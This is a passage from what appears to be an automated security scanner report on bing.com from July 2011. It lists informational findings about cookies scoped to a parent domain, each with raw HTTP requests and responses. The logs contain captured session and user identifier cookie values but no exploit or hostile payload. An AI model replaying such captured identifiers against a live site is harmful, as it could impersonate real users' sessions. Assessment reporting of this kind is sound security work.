Cookie: SRCHUID=V=2&GUID=E8D2DDB02E5B451C9F1EB509739AB1CC; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110601; SRCHD=SM=1&MS=1842502&D=1841741&AF=MSN005; MUID=3957719BE8F34A5DA51D204E7E06704A; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; _FP=; _RwBf=credit=-1&s=0; _UR=OMW=1

Response

HTTP/1.1 200 OK
Content-Length: 0
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:05:34 GMT
Connection: close
Set-Cookie: _SS=SID=6972CFBED6CD45B1A2140850C807FA64; domain=.bing.com; path=/


13.13. http://www.bing.com/fd/AnswerBarHandler

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/AnswerBarHandler

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/AnswerBarHandler?q=Jonah%20Hill&vertical=VirtualEarth&subvertical=maps HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bing.com
Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865531&D=1865529&AF=MPSRCH; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; _FS=mkt=en-US
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 881
Date: Tue, 19 Jul 2011 12:11:11 GMT
Connection: keep-alive
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865531&D=1865529&AF=MPSRCH; expires=Thu, 18-Jul-2013 12:11:11 GMT; domain=.bing.com; path=/

<ul class="sw_a" id="sw_abarl"><li><a href="/search?q=Jonah+Hill" onmousedown="return si_T('&amp;ID=FD,4.1')">Web</a></li><li><a href="/news/search?q=Jonah+Hill&amp;qpvt=Jonah+Hill" onmousedown="retur
...[SNIP]...

13.14. http://www.bing.com/fd/InlineFeedbackHandler.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/InlineFeedbackHandler.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/InlineFeedbackHandler.aspx?IG=29ae479b70674c24adf680937cb5e176&CID=14230B4BB5064F8B9C1A3D1C2C91E937&IID=FD.1&WFID=wf11 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bing.com
Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=D=1865529&MS=1865529&AF=MPSRCH; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:34 GMT
Content-Length: 2459
Connection: keep-alive
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/

<div class="fbd" id="wf11"><div class="fbcontainer" id="wf11wdg1" style="display: none;"><form action="#" name="fb_formwf11wdg1"><table cellpadding="0" cellspacing="0" class="fbt" width="100%"><tbody>
...[SNIP]...

13.15. http://www.bing.com/fd/ls/GLinkPing.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/GLinkPing.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/GLinkPing.aspx?IG=33ba7e8b57514147a88c942f70994212&CID=14230B4BB5064F8B9C1A3D1C2C91E937&PM=Y&ID=FD,22.1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:09:22 GMT
Connection: close
Set-Cookie: _SS=SID=84364DCD717D4D0BB86135D1E06CC7AF; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865529; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=FA19F2A46E8B44F79C0D92A1E319533C; expires=Thu, 18-Jul-2013 12:09:22 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

13.16. http://www.bing.com/fd/ls/l

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/l

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/l?IG=0a2cf4887a3946bf9d66aedb51daf8c2&CID=14230B4BB5064F8B9C1A3D1C2C91E937&PM=Y&Type=Event.CPT&DATA={"pp":{"S":"L","PC":28,"FC":-1,"BC":28,"BS":45,"H":46,"FE":-1,"LE":-1,"C1":-1,"C2":-1,"BP":47,"KP":-1,"CT":606,"IL":2}}&P=SERP&DA=Bl2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:09:23 GMT
Connection: close
Set-Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865529; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1; expires=Thu, 18-Jul-2013 12:09:22 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

13.17. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/AppGalleryDisplayProvider.ashx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/AppGalleryDisplayProvider.ashx?q=Jonah+Hill&mkt=en-US&FORM=BYFD HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865531&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4562
Content-Type: application/json; charset=utf-8
Expires: -1
X-BM-TraceID: e73c6b6f5dbd46658ecc67e88bfb7ca8
X-Ve-Server: BL2-01203-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001203
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:11:38 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: SRCHD=AF=BYFD&MS=1865531&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:11:38 GMT; domain=.bing.com; path=/

window.appGalleryContainerJSON = {"catUrl":"http://c0.ecn.catalogservice.virtualearth.net/cs/dc/pf/Catalog/676cd0b3-da60-4183-a07f-59d638480169_Catalog.xap.png","AppGalleryMarkup":"\r\n\r\n\u003cdiv i
...[SNIP]...

13.18. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/AppGalleryDisplayProvider.ashx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/AppGalleryDisplayProvider.ashx?q=&mkt=en&FORM=BYLH HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4562
Content-Type: application/json; charset=utf-8
Expires: -1
X-BM-TraceID: 381b21893e064134838136a47cf10f1d
X-Ve-Server: BL2-01211-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:43 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1865529&MS=1865529&AF=BYLH; expires=Thu, 18-Jul-2013 12:09:42 GMT; domain=.bing.com; path=/

window.appGalleryContainerJSON = {"catUrl":"http://c0.ecn.catalogservice.virtualearth.net/cs/dc/pf/Catalog/676cd0b3-da60-4183-a07f-59d638480169_Catalog.xap.png","AppGalleryMarkup":"\r\n\r\n\u003cdiv i
...[SNIP]...

13.19. http://www.bing.com/maps/MapAppsScript.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/MapAppsScript.ashx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/MapAppsScript.ashx?q=&mkt=en&FORM=BYLH HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
X-BM-TraceID: 45902850fb194154bf99af43b8d3f5ac
X-Ve-Server: BL2-01209-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001209
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1865529&MS=1865529&AF=BYLH; expires=Thu, 18-Jul-2013 12:09:42 GMT; domain=.bing.com; path=/
Content-Length: 6709

var slContainerText = "<div id='silverlightControlHost' style='height: 1px; width: 2px; top: 30px; left: 0px; position: absolute;'><object id='mapAppSL' data='data:application/x-silverlight-2,' type='
...[SNIP]...

13.20. http://www.bing.com/maps/MapAppsScript.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/MapAppsScript.ashx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/MapAppsScript.ashx?q=&mkt=en-US&FORM=BYFD HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
X-BM-TraceID: ba10842c4078412f98876aba4f7bb278
X-Ve-Server: BL2-01204-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001204
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:10:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: SRCHD=AF=BYFD&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:10:00 GMT; domain=.bing.com; path=/
Content-Length: 6709

var slContainerText = "<div id='silverlightControlHost' style='height: 1px; width: 2px; top: 30px; left: 0px; position: absolute;'><object id='mapAppSL' data='data:application/x-silverlight-2,' type='
...[SNIP]...

13.21. http://www.bing.com/maps/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /maps/default.aspx?mkt=en&form=MPSRCH HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache,no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.bing.com
Content-Length: 2647
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

scriptManager=scriptManager%7cInvokeCategoryBrowser&__EVENTTARGET=InvokeCategoryBrowser&__EVENTARGUMENT=undefined&__VIEWSTATE=%2fwEPDwUJMTMyNzQzNzcxD2QWDGYPFgIeBFRleHQFCTxmZDpoZWFkPmQCBg8WAh8ABQo8L2Zk
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 0c13e1f5d3e94de590841c22ebc809c4
X-Ve-Server: BL2-01202-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001202
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1865529&MS=1865529&AF=MPSRCH; expires=Thu, 18-Jul-2013 12:09:31 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; expires=Thu, 18-Jul-2013 12:09:31 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:09:31 GMT; domain=.bing.com; path=/
Content-Length: 11829

6516|updatePanel|TaskHost_Search|
   
                           <span id="TaskHost_SearchTaskPageContext" class="PageContext"><span id="TaskHost_TaskHost_Search_pt" style="display:none;"></span><
...[SNIP]...

13.22. http://www.bing.com/maps/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /maps/default.aspx?mkt=en-US&form=MPSRCH HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache,no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.bing.com
Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529&D=1865529&AF=MPSRCH; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719
Content-Length: 2657
Accept-Encoding: gzip, deflate

scriptManager=scriptManager%7cInvokeCategoryBrowser&__EVENTTARGET=InvokeCategoryBrowser&__EVENTARGUMENT=undefined&__VIEWSTATE=%2fwEPDwUJMTMyNzQzNzcxD2QWDGYPFgIeBFRleHQFCTxmZDpoZWFkPmQCBg8WAh8ABQo8L2Zk
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 717d213c93e1401590752582d6ba7a32
X-Ve-Server: BL2-01208-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:10:00 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865530&D=1865529&AF=MPSRCH; expires=Thu, 18-Jul-2013 12:10:00 GMT; domain=.bing.com; path=/
Content-Length: 11836

6516|updatePanel|TaskHost_Search|
   
                           <span id="TaskHost_SearchTaskPageContext" class="PageContext"><span id="TaskHost_TaskHost_Search_pt" style="display:none;"></span><
...[SNIP]...

13.23. http://www.bing.com/news/s/news3B_c.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3B_c.css

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/s/news3B_c.css?v=1126040805 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=D=1865529&MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=2451BC32004969401AB2BE06044969F0&TUID=1; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css
Last-Modified: Fri, 26 Nov 2010 04:08:05 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 16909
Date: Tue, 19 Jul 2011 12:09:51 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=SM=1&D=1865529&MS=1865529&AF=NOFORM; expires=Thu, 18-Jul-2013 12:09:51 GMT; domain=.bing.com; path=/

.NewsAlertForm{position:absolute;color:#555;text-decoration:none;display:block;float:right;margin-top:100px;*margin-top:0;margin-right:0;z-index:100;top:75px;left:25px}.NewsAlertForm .AlertDropDownHea
...[SNIP]...

13.24. http://www.bing.com/news/s/news3B_c.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3B_c.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/s/news3B_c.js?v=0822204709 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Last-Modified: Sun, 22 Aug 2010 20:47:09 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 4228
Date: Tue, 19 Jul 2011 12:10:50 GMT
Connection: close
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:10:50 GMT; domain=.bing.com; path=/

var _ghlc=4;function _ghlp(a){return _ge("id_hlp_"+a)}function _ghlt(a){return _ge("id_hlt_"+a)}function _gishide(a){return a.style.display=="none"}function _gisshow(a){return!_gishide(a)}function _gs
...[SNIP]...

13.25. http://www.bing.com/news/s/news3S_c.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3S_c.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/s/news3S_c.css?v=1110024132 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529&SM=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css
Last-Modified: Wed, 10 Nov 2010 02:41:32 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 16722
Date: Tue, 19 Jul 2011 12:09:57 GMT
Connection: close
